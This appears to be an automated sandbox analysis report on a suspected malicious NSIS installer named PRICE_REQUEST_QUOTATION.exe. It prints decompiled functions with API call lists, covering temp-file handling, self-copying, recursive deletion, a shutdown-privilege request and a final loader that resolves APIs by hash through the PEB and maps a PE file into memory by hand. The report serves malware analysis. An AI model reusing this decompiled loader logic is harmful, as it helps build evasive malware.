                                        				intOrPtr _t47;
                                        				CHAR* _t51;
                                        				char* _t54;
                                        				CHAR* _t56;
                                        				void* _t60;
                                        				intOrPtr _t62;
                                        				int _t64;
                                        				char* _t67;
                                        				char* _t68;
                                        				int _t69;
                                        				char* _t71;
                                        				char* _t74;
                                        				intOrPtr _t87;
                                        				int _t91;
                                        				intOrPtr _t93;
                                        				void* _t95;
                                        				void* _t107;
                                        				intOrPtr* _t108;
                                        				char _t111;
                                        				CHAR* _t116;
                                        				char* _t117;
                                        				CHAR* _t118;
                                        				char* _t119;
                                        				void* _t121;
                                        				char* _t123;
                                        				char* _t125;
                                        				char* _t126;
                                        				void* _t128;
                                        				void* _t129;
                                        				intOrPtr _t138;
                                        				char _t147;
                                        
                                        				 *(_t129 + 0x20) = 0;
                                        				 *((intOrPtr*)(_t129 + 0x14)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                        				 *(_t129 + 0x1c) = 0;
                                        				 *(_t129 + 0x18) = 0x20;
                                        				SetErrorMode(0x8001); // executed
                                        				if(GetVersion() != 6) {
                                        					_t108 = E00405F57(0);
                                        					if(_t108 != 0) {
                                        						 *_t108(0xc00);
                                        					}
                                        				}
                                        				_t118 = "UXTHEME";
                                        				goto L4;
                                        				while(1) {
                                        					L22:
                                        					_t111 =  *_t56;
                                        					_t134 = _t111;
                                        					if(_t111 == 0) {
                                        						break;
                                        					}
                                        					__eflags = _t111 - 0x20;
                                        					if(_t111 != 0x20) {
                                        						L10:
                                        						__eflags =  *_t56 - 0x22;
                                        						 *((char*)(_t129 + 0x14)) = 0x20;
                                        						if( *_t56 == 0x22) {
                                        							_t56 =  &(_t56[1]);
                                        							__eflags = _t56;
                                        							 *((char*)(_t129 + 0x14)) = 0x22;
                                        						}
                                        						__eflags =  *_t56 - 0x2f;
                                        						if( *_t56 != 0x2f) {
                                        							L20:
                                        							_t56 = E004056E5(_t56,  *((intOrPtr*)(_t129 + 0x14)));
                                        							__eflags =  *_t56 - 0x22;
                                        							if(__eflags == 0) {
                                        								_t56 =  &(_t56[1]);
                                        								__eflags = _t56;
                                        							}
                                        							continue;
                                        						} else {
                                        							_t56 =  &(_t56[1]);
                                        							__eflags =  *_t56 - 0x53;
                                        							if( *_t56 == 0x53) {
                                        								__eflags = (_t56[1] | 0x00000020) - 0x20;
                                        								if((_t56[1] | 0x00000020) == 0x20) {
                                        									_t14 = _t129 + 0x18;
                                        									 *_t14 =  *(_t129 + 0x18) | 0x00000002;
                                        									__eflags =  *_t14;
                                        								}
                                        							}
                                        							__eflags =  *_t56 - 0x4352434e;
                                        							if( *_t56 == 0x4352434e) {
                                        								__eflags = (_t56[4] | 0x00000020) - 0x20;
                                        								if((_t56[4] | 0x00000020) == 0x20) {
                                        									_t17 = _t129 + 0x18;
                                        									 *_t17 =  *(_t129 + 0x18) | 0x00000004;
                                        									__eflags =  *_t17;
                                        								}
                                        							}
                                        							__eflags =  *((intOrPtr*)(_t56 - 2)) - 0x3d442f20;
                                        							if( *((intOrPtr*)(_t56 - 2)) == 0x3d442f20) {
                                        								 *((intOrPtr*)(_t56 - 2)) = 0;
                                        								_t57 =  &(_t56[2]);
                                        								__eflags =  &(_t56[2]);
                                        								E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t57);
                                        								L25:
                                        								_t116 = "C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                                        								GetTempPathA(0x400, _t116);
                                        								_t60 = E004030F9(_t134);
                                        								_t135 = _t60;
                                        								if(_t60 != 0) {
                                        									L27:
                                        									DeleteFileA("1033"); // executed
                                        									_t62 = E00402C55(_t136,  *(_t129 + 0x18)); // executed
                                        									 *((intOrPtr*)(_t129 + 0x10)) = _t62;
                                        									if(_t62 != 0) {
                                        										L37:
                                        										E00403540();
                                        										__imp__OleUninitialize();
                                        										_t143 =  *((intOrPtr*)(_t129 + 0x10));
                                        										if( *((intOrPtr*)(_t129 + 0x10)) == 0) {
                                        											__eflags =  *0x42ecb4; // 0x0
                                        											if(__eflags == 0) {
                                        												L64:
                                        												_t64 =  *0x42eccc; // 0xffffffff
                                        												__eflags = _t64 - 0xffffffff;
                                        												if(_t64 != 0xffffffff) {
                                        													 *(_t129 + 0x1c) = _t64;
                                        												}
                                        												ExitProcess( *(_t129 + 0x1c));
                                        											}
                                        											_t126 = E00405F57(5);
                                        											_t119 = E00405F57(6);
                                        											_t67 = E00405F57(7);
                                        											__eflags = _t126;
                                        											_t117 = _t67;
                                        											if(_t126 != 0) {
                                        												__eflags = _t119;
                                        												if(_t119 != 0) {
                                        													__eflags = _t117;
                                        													if(_t117 != 0) {
                                        														_t74 =  *_t126(GetCurrentProcess(), 0x28, _t129 + 0x20);
                                        														__eflags = _t74;
                                        														if(_t74 != 0) {
                                        															 *_t119(0, "SeShutdownPrivilege", _t129 + 0x28);
                                        															 *(_t129 + 0x3c) = 1;
                                        															 *(_t129 + 0x48) = 2;
                                        															 *_t117( *((intOrPtr*)(_t129 + 0x34)), 0, _t129 + 0x2c, 0, 0, 0);
                                        														}
                                        													}
                                        												}
                                        											}
                                        											_t68 = E00405F57(8);
                                        											__eflags = _t68;
                                        											if(_t68 == 0) {
                                        												L62:
                                        												_t69 = ExitWindowsEx(2, 0x80040002);
                                        												__eflags = _t69;
                                        												if(_t69 != 0) {
                                        													goto L64;
                                        												}
                                        												goto L63;
                                        											} else {
                                        												_t71 =  *_t68(0, 0, 0, 0x25, 0x80040002);
                                        												__eflags = _t71;
                                        												if(_t71 == 0) {
                                        													L63:
                                        													E0040140B(9);
                                        													goto L64;
                                        												}
                                        												goto L62;
                                        											}
                                        										}
                                        										E00405488( *((intOrPtr*)(_t129 + 0x14)), 0x200010);
                                        										ExitProcess(2);
                                        									}
                                        									_t138 =  *0x42ec3c; // 0x0
                                        									if(_t138 == 0) {
                                        										L36:
                                        										 *0x42eccc =  *0x42eccc | 0xffffffff;
                                        										 *(_t129 + 0x1c) = E0040361A( *0x42eccc);
                                        										goto L37;
                                        									}
                                        									_t123 = E004056E5(_t125, 0);
                                        									while(_t123 >= _t125) {
                                        										__eflags =  *_t123 - 0x3d3f5f20;
                                        										if(__eflags == 0) {
                                        											break;
                                        										}
                                        										_t123 = _t123 - 1;
                                        										__eflags = _t123;
                                        									}
                                        									_t140 = _t123 - _t125;
                                        									 *((intOrPtr*)(_t129 + 0x10)) = "Error launching installer";
                                        									if(_t123 < _t125) {
                                        										_t121 = E0040540F(_t143);
                                        										lstrcatA(_t116, "~nsu");
                                        										if(_t121 != 0) {
                                        											lstrcatA(_t116, "A");
                                        										}
                                        										lstrcatA(_t116, ".tmp");
                                        										_t127 = "C:\\Users\\alfons\\Desktop";
                                        										if(lstrcmpiA(_t116, "C:\\Users\\alfons\\Desktop") != 0) {
                                        											_push(_t116);
                                        											if(_t121 == 0) {
                                        												E004053F2();
                                        											} else {
                                        												E00405375();
                                        											}
                                        											SetCurrentDirectoryA(_t116);
                                        											_t147 = "C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
                                        											if(_t147 == 0) {
                                        												E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t127);
                                        											}
                                        											E00405BC7(0x42f000,  *(_t129 + 0x20));
                                        											 *0x42f400 = 0x41;
                                        											_t128 = 0x1a;
                                        											do {
                                        												_t87 =  *0x42ec30; // 0x6c0230
                                        												E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t87 + 0x120)));
                                        												DeleteFileA(0x428c58);
                                        												if( *((intOrPtr*)(_t129 + 0x10)) != 0) {
                                        													_t91 = CopyFileA("C:\\Users\\alfons\\Desktop\\PRICE_REQUEST_QUOTATION.exe", 0x428c58, 1);
                                        													_t149 = _t91;
                                        													if(_t91 != 0) {
                                        														_push(0);
                                        														_push(0x428c58);
                                        														E00405915(_t149);
                                        														_t93 =  *0x42ec30; // 0x6c0230
                                        														E00405BE9(0, _t116, 0x428c58, 0x428c58,  *((intOrPtr*)(_t93 + 0x124)));
                                        														_t95 = E00405427(0x428c58);
                                        														if(_t95 != 0) {
                                        															CloseHandle(_t95);
                                        															 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                        														}
                                        													}
                                        												}
                                        												 *0x42f400 =  *0x42f400 + 1;
                                        												_t128 = _t128 - 1;
                                        												_t151 = _t128;
                                        											} while (_t128 != 0);
                                        											_push(0);
                                        											_push(_t116);
                                        											E00405915(_t151);
                                        										}
                                        										goto L37;
                                        									}
                                        									 *_t123 = 0;
                                        									_t124 =  &(_t123[4]);
                                        									if(E0040579B(_t140,  &(_t123[4])) == 0) {
                                        										goto L37;
                                        									}
                                        									E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
                                        									E00405BC7("C:\\Users\\alfons\\AppData\\Local\\Temp", _t124);
                                        									 *((intOrPtr*)(_t129 + 0x10)) = 0;
                                        									goto L36;
                                        								}
                                        								GetWindowsDirectoryA(_t116, 0x3fb);
                                        								lstrcatA(_t116, "\\Temp");
                                        								_t107 = E004030F9(_t135);
                                        								_t136 = _t107;
                                        								if(_t107 == 0) {
                                        									goto L37;
                                        								}
                                        								goto L27;
                                        							} else {
                                        								goto L20;
                                        							}
                                        						}
                                        					} else {
                                        						goto L9;
                                        					}
                                        					do {
                                        						L9:
                                        						_t56 =  &(_t56[1]);
                                        						__eflags =  *_t56 - 0x20;
                                        					} while ( *_t56 == 0x20);
                                        					goto L10;
                                        				}
                                        				goto L25;
                                        				L4:
                                        				E00405EE9(_t118); // executed
                                        				_t118 =  &(_t118[lstrlenA(_t118) + 1]);
                                        				if( *_t118 != 0) {
                                        					goto L4;
                                        				} else {
                                        					E00405F57(0xd);
                                        					_t47 = E00405F57(0xb);
                                        					 *0x42ec24 = _t47;
                                        					__imp__#17();
                                        					__imp__OleInitialize(0); // executed
                                        					 *0x42ecd8 = _t47;
                                        					SHGetFileInfoA(0x429058, 0, _t129 + 0x38, 0x160, 0); // executed
                                        					E00405BC7("jwfmxhqapdbzygp Setup", "NSIS Error");
                                        					_t51 = GetCommandLineA();
                                        					_t125 = "\"C:\\Users\\alfons\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" ";
                                        					E00405BC7(_t125, _t51);
                                        					 *0x42ec20 = GetModuleHandleA(0);
                                        					_t54 = _t125;
                                        					if("\"C:\\Users\\alfons\\Desktop\\PRICE_REQUEST_QUOTATION.exe\" " == 0x22) {
                                        						 *((char*)(_t129 + 0x14)) = 0x22;
                                        						_t54 =  &M00434001;
                                        					}
                                        					_t56 = CharNextA(E004056E5(_t54,  *((intOrPtr*)(_t129 + 0x14))));
                                        					 *(_t129 + 0x20) = _t56;
                                        					goto L22;
                                        				}
                                        			}

                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 00403150
                                        • GetVersion.KERNEL32 ref: 00403156
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040317F
                                        • #17.COMCTL32(0000000B,0000000D), ref: 004031A0
                                        • OleInitialize.OLE32(00000000), ref: 004031A7
                                        • SHGetFileInfoA.SHELL32(00429058,00000000,?,00000160,00000000), ref: 004031C3
                                        • GetCommandLineA.KERNEL32(jwfmxhqapdbzygp Setup,NSIS Error), ref: 004031D8
                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000), ref: 004031EB
                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00409168), ref: 00403216
                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032AD
                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004032C2
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004032CE
                                        • DeleteFileA.KERNELBASE(1033), ref: 004032E5
                                          • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                                          • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?), ref: 00405F84
                                        • OleUninitialize.OLE32(00000020), ref: 00403366
                                        • ExitProcess.KERNEL32 ref: 00403386
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000,00000020), ref: 00403399
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000,00000020), ref: 004033A8
                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000,00000020), ref: 004033B3
                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,00000000,00000020), ref: 004033BF
                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033DB
                                        • DeleteFileA.KERNEL32(00428C58,00428C58,?,0042F000,?), ref: 00403425
                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe,00428C58,00000001), ref: 00403439
                                        • CloseHandle.KERNEL32(00000000,00428C58,00428C58,?,00428C58,00000000), ref: 00403466
                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 004034BF
                                        • ExitWindowsEx.USER32 ref: 00403517
                                        • ExitProcess.KERNEL32 ref: 0040353A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                        • String ID: $ /D=$ _?=$"$"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$jwfmxhqapdbzygp Setup$~nsu
                                        • API String ID: 3469842172-1539685952
                                        • Opcode ID: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                        • Instruction ID: d16e5acc50ad9605a1934e3a6ea537af925639c8ce6f3cfaab4d64070601e644
                                        • Opcode Fuzzy Hash: c827ac6488386cdb1cf1d6f25d9587759d491db5d28cf5fcf0659e8390b07969
                                        • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 98%
                                        			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				struct _WIN32_FIND_DATAA _v332;
                                        				signed int _t37;
                                        				char* _t49;
                                        				signed int _t52;
                                        				signed int _t55;
                                        				signed int _t61;
                                        				signed int _t63;
                                        				void* _t65;
                                        				signed int _t68;
                                        				CHAR* _t70;
                                        				CHAR* _t72;
                                        				char* _t75;
                                        
                                        				_t72 = _a4;
                                        				_t37 = E0040579B(__eflags, _t72);
                                        				_v12 = _t37;
                                        				if((_a8 & 0x00000008) != 0) {
                                        					_t63 = DeleteFileA(_t72); // executed
                                        					asm("sbb eax, eax");
                                        					_t65 =  ~_t63 + 1;
                                        					 *0x42eca8 =  *0x42eca8 + _t65;
                                        					return _t65;
                                        				}
                                        				_t68 = _a8 & 0x00000001;
                                        				__eflags = _t68;
                                        				_v8 = _t68;
                                        				if(_t68 == 0) {
                                        					L5:
                                        					E00405BC7(0x42b0a8, _t72);
                                        					__eflags = _t68;
                                        					if(_t68 == 0) {
                                        						E00405701(_t72);
                                        					} else {
                                        						lstrcatA(0x42b0a8, "\*.*");
                                        					}
                                        					__eflags =  *_t72;
                                        					if( *_t72 != 0) {
                                        						L10:
                                        						lstrcatA(_t72, 0x409010);
                                        						L11:
                                        						_t70 =  &(_t72[lstrlenA(_t72)]);
                                        						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
                                        						__eflags = _t37 - 0xffffffff;
                                        						_a4 = _t37;
                                        						if(_t37 == 0xffffffff) {
                                        							L29:
                                        							__eflags = _v8;
                                        							if(_v8 != 0) {
                                        								_t31 = _t70 - 1;
                                        								 *_t31 =  *(_t70 - 1) & 0x00000000;
                                        								__eflags =  *_t31;
                                        							}
                                        							goto L31;
                                        						} else {
                                        							goto L12;
                                        						}
                                        						do {
                                        							L12:
                                        							_t75 =  &(_v332.cFileName);
                                        							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
                                        							__eflags =  *_t49;
                                        							if( *_t49 != 0) {
                                        								__eflags = _v332.cAlternateFileName;
                                        								if(_v332.cAlternateFileName != 0) {
                                        									_t75 =  &(_v332.cAlternateFileName);
                                        								}
                                        							}
                                        							__eflags =  *_t75 - 0x2e;
                                        							if( *_t75 != 0x2e) {
                                        								L19:
                                        								E00405BC7(_t70, _t75);
                                        								__eflags = _v332.dwFileAttributes & 0x00000010;
                                        								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                                        									E0040587F(_t72);
                                        									_t52 = DeleteFileA(_t72);
                                        									__eflags = _t52;
                                        									if(_t52 != 0) {
                                        										E00404EB3(0xfffffff2, _t72);
                                        									} else {
                                        										__eflags = _a8 & 0x00000004;
                                        										if((_a8 & 0x00000004) == 0) {
                                        											 *0x42eca8 =  *0x42eca8 + 1;
                                        										} else {
                                        											E00404EB3(0xfffffff1, _t72);
                                        											E00405915(__eflags, _t72, 0);
                                        										}
                                        									}
                                        								} else {
                                        									__eflags = (_a8 & 0x00000003) - 3;
                                        									if(__eflags == 0) {
                                        										E004054EC(_t70, __eflags, _t72, _a8);
                                        									}
                                        								}
                                        								goto L27;
                                        							}
                                        							_t61 =  *((intOrPtr*)(_t75 + 1));
                                        							__eflags = _t61;
                                        							if(_t61 == 0) {
                                        								goto L27;
                                        							}
                                        							__eflags = _t61 - 0x2e;
                                        							if(_t61 != 0x2e) {
                                        								goto L19;
                                        							}
                                        							__eflags =  *((char*)(_t75 + 2));
                                        							if( *((char*)(_t75 + 2)) == 0) {
                                        								goto L27;
                                        							}
                                        							goto L19;
                                        							L27:
                                        							_t55 = FindNextFileA(_a4,  &_v332);
                                        							__eflags = _t55;
                                        						} while (_t55 != 0);
                                        						_t37 = FindClose(_a4);
                                        						goto L29;
                                        					}
                                        					__eflags =  *0x42b0a8 - 0x5c;
                                        					if( *0x42b0a8 != 0x5c) {
                                        						goto L11;
                                        					}
                                        					goto L10;
                                        				} else {
                                        					__eflags = _t37;
                                        					if(_t37 == 0) {
                                        						L31:
                                        						__eflags = _v8;
                                        						if(_v8 == 0) {
                                        							L39:
                                        							return _t37;
                                        						}
                                        						__eflags = _v12;
                                        						if(_v12 != 0) {
                                        							_t37 = E00405EC2(_t72);
                                        							__eflags = _t37;
                                        							if(_t37 == 0) {
                                        								goto L39;
                                        							}
                                        							E004056BA(_t72);
                                        							E0040587F(_t72);
                                        							_t37 = RemoveDirectoryA(_t72);
                                        							__eflags = _t37;
                                        							if(_t37 != 0) {
                                        								return E00404EB3(0xffffffe5, _t72);
                                        							}
                                        							__eflags = _a8 & 0x00000004;
                                        							if((_a8 & 0x00000004) == 0) {
                                        								goto L33;
                                        							}
                                        							E00404EB3(0xfffffff1, _t72);
                                        							return E00405915(__eflags, _t72, 0);
                                        						}
                                        						L33:
                                        						 *0x42eca8 =  *0x42eca8 + 1;
                                        						return _t37;
                                        					}
                                        					__eflags = _a8 & 0x00000002;
                                        					if((_a8 & 0x00000002) == 0) {
                                        						goto L31;
                                        					}
                                        					goto L5;
                                        				}
                                        			}


















                                        APIs
                                        • DeleteFileA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040550A
                                        • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405554
                                        • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405575
                                        • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040557B
                                        • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040558C
                                        • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
                                        • FindClose.KERNEL32(?), ref: 0040564F
                                        Strings
                                        • \*.*, xrefs: 0040554E
                                        • "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" , xrefs: 004054EC
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004054F6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                        • String ID: "C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                        • API String ID: 2035342205-2409741021
                                        • Opcode ID: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                        • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
                                        • Opcode Fuzzy Hash: 218d19487e3f4a391fa6828d614a1926fec5280024387b6012ef8031cc60189a
                                        • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 82%
                                        			E7333A402(void* __eflags, intOrPtr _a4) {
                                        				void* _v8;
                                        				signed int _v12;
                                        				long _v16;
                                        				void* _v20;
                                        				intOrPtr _v24;
                                        				intOrPtr _v28;
                                        				signed int _v32;
                                        				intOrPtr _v36;
                                        				long _v40;
                                        				short _v42;
                                        				short _v44;
                                        				short _v46;
                                        				short _v48;
                                        				short _v50;
                                        				short _v52;
                                        				short _v54;
                                        				short _v56;
                                        				short _v58;
                                        				char _v60;
                                        				short _t60;
                                        				short _t61;
                                        				short _t62;
                                        				void* _t78;
                                        				void* _t79;
                                        				void _t81;
                                        				long _t86;
                                        				void* _t91;
                                        				void* _t95;
                                        				void* _t100;
                                        				void* _t102;
                                        				short _t103;
                                        				short _t120;
                                        				signed int _t133;
                                        				void* _t135;
                                        				void* _t136;
                                        				void* _t138;
                                        				void* _t139;
                                        				void* _t141;
                                        				void* _t142;
                                        
                                        				_t142 = __eflags;
                                        				_t60 = 0x6e;
                                        				_v60 = _t60;
                                        				_t100 = 0;
                                        				_t61 = 0x74;
                                        				_t103 = 0x64;
                                        				_t120 = 0x6c;
                                        				_v58 = _t61;
                                        				_t62 = 0x2e;
                                        				_v50 = _t62;
                                        				_v56 = _t103;
                                        				_v54 = _t120;
                                        				_v52 = _t120;
                                        				_v48 = _t103;
                                        				_v46 = _t120;
                                        				_v44 = _t120;
                                        				_v42 = 0;
                                        				_t137 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
                                        				E7333A776( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fe63623);
                                        				_v16 = E7333A776( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18)), 0x7fbd727f);
                                        				_v12 = E7333A776(_t137, 0x7fb47add);
                                        				_v32 = E7333A776(_t137, 0x7fe7f840);
                                        				_v24 = E7333A776(_t137, 0x7fe1f1fb);
                                        				_v28 = E7333A776(_t137, 0x7f951704);
                                        				_v36 = E7333A776(_t137, 0x7f91a078);
                                        				_t78 = CreateFileW(E7333A744( &_v60, _t142), 0x80000000, 7, 0, 3, 0x80, 0); // executed
                                        				_t138 = _t78;
                                        				_v20 = _t138;
                                        				if(_t138 == 0xffffffff) {
                                        					L13:
                                        					_t139 = _t100;
                                        					L14:
                                        					_t79 = _v20;
                                        					__eflags = _t79;
                                        					if(_t79 != 0) {
                                        						_v24(_t79);
                                        					}
                                        					_v36(0);
                                        					L22:
                                        					while( *_t100 != 0xb8) {
                                        						_t81 =  *_t100;
                                        						__eflags = _t81 - 0xe9;
                                        						if(_t81 != 0xe9) {
                                        							__eflags = _t81 - 0xea;
                                        							if(_t81 != 0xea) {
                                        								_t100 = _t100 + 1;
                                        								__eflags = _t100;
                                        							} else {
                                        								_t100 =  *(_t100 + 1);
                                        							}
                                        						} else {
                                        							_t100 = _t100 + 5 +  *(_t100 + 1);
                                        						}
                                        					}
                                        					_t135 =  *(_t100 + 1);
                                        					if(_t139 != 0) {
                                        						VirtualFree(_t139, 0, 0x8000);
                                        					}
                                        					return _t135;
                                        				}
                                        				_t86 = _v16(_t138, 0);
                                        				_v16 = _t86;
                                        				if(_t86 == 0xffffffff) {
                                        					goto L13;
                                        				}
                                        				_t136 = VirtualAlloc(0, _t86, 0x3000, 4);
                                        				if(_t136 == 0 || ReadFile(_t138, _t136, _v16,  &_v40, 0) == 0) {
                                        					goto L13;
                                        				} else {
                                        					_t141 =  *((intOrPtr*)(_t136 + 0x3c)) + _t136;
                                        					_v32 =  *(_t141 + 0x14) & 0x0000ffff;
                                        					_t91 = VirtualAlloc(0,  *(_t141 + 0x50), 0x3000, 4);
                                        					_v8 = _t91;
                                        					if(_t91 == 0) {
                                        						_t139 = _t91;
                                        						goto L14;
                                        					}
                                        					E7333A6DB(_t91, _t136,  *((intOrPtr*)(_t141 + 0x54)));
                                        					_v12 = _v12 & 0;
                                        					if(0 >=  *(_t141 + 6)) {
                                        						L8:
                                        						_t139 = _v8;
                                        						_t100 = E7333A776(_t139, _a4);
                                        						if(_t100 == 0) {
                                        							goto L14;
                                        						}
                                        						_t95 = _v20;
                                        						if(_t95 != 0) {
                                        							FindCloseChangeNotification(_t95);
                                        						}
                                        						VirtualFree(_t136, 0, 0x8000);
                                        						goto L22;
                                        					} else {
                                        						_t102 = _v8;
                                        						_t116 = _v32 + 0x2c + _t141;
                                        						_v16 = _v32 + 0x2c + _t141;
                                        						do {
                                        							E7333A6DB( *((intOrPtr*)(_t116 - 8)) + _t102,  *_t116 + _t136,  *((intOrPtr*)(_t116 - 4)));
                                        							_t133 = _v12 + 1;
                                        							_t116 = _v16 + 0x28;
                                        							_v12 = _t133;
                                        							_v16 = _v16 + 0x28;
                                        						} while (_t133 < ( *(_t141 + 6) & 0x0000ffff));
                                        						goto L8;
                                        					}
                                        				}
                                        			}











































                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7333A4DC
                                        • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16,7333A349), ref: 7333A506
                                        • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16), ref: 7333A51D
                                        • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16,7333A349), ref: 7333A53F
                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16,7333A349,00000000,00000000), ref: 7333A5B2
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16,7333A349), ref: 7333A5BD
                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,7333A18A,7FC6FA16,7333A349,00000000), ref: 7333A608
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.275260371.000000007333A000.00000040.00020000.sdmp, Offset: 73330000, based on PE: true
